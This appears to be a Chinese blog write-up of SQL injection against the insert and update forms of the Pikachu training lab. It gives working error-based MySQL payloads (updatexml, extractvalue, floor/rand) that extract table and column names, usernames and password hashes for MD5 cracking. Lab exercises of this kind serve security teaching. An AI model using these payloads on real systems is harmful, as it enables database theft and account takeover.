pikachu靶场(sql注入 insert/update)

一、insert注入

1.打开burpsuite抓一下注册的包

2.对红色圈圈里所提交的参数进行注入

常用函数符号:

(1)0x7e表示 ~符号

(2)database()显示出数据库名字

  (3)version()显示出版本号

(4)user()显示出用户名

3.三种注入语句

(1)第一种注入语句:

' or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.ta bles group by x)a) or '

(2)第二种注入语句

'  or  updatexml(1,concat(0x7e,version()),0)  or '

(3)第三种注入语句

'  or  extractvalue(1,concat(0x7e,user()))  or '

updatexml()和extractvalue()和concat()三种MySQL数据库函数

updatexml函数具有查询功能 并且会再xpath处查询 你将语法构造错误 然后它就会将他查询的结果已报错的形式

concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,爆出查询结果

extractvalue()函数和updatexml类似。

(4)在上述后两个注入语句中

可以替换为database()替换为:

(select group_concat(table_name) from information_schema.tables where table_schema='pikachu')

 爆出表名:

爆出列名:

'  or  updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='member')),0)  or '

爆出密码和用户名:

可以这么构造语句:

先爆用户名

'  or  updatexml(1,concat(0x7e,(select concat(username,0x7e) from member limit 8,1)),0)  or'

再爆密码进行md5解密(由于updatexml长度有限,需要截取两次查看完整密码)

' or updatexml(1,concat(0x7e,
substr((select pw from member limit 8,1)
,1,40)),3) or'

' or updatexml(1,concat(0x7e,
substr((select pw from member limit 8,1)
,4,40)),3) or'

之后拼接后进行md5解密

最后就可以进行登录了:

update与insert注入方式大致相同。

  • 0
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梅_花_七

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值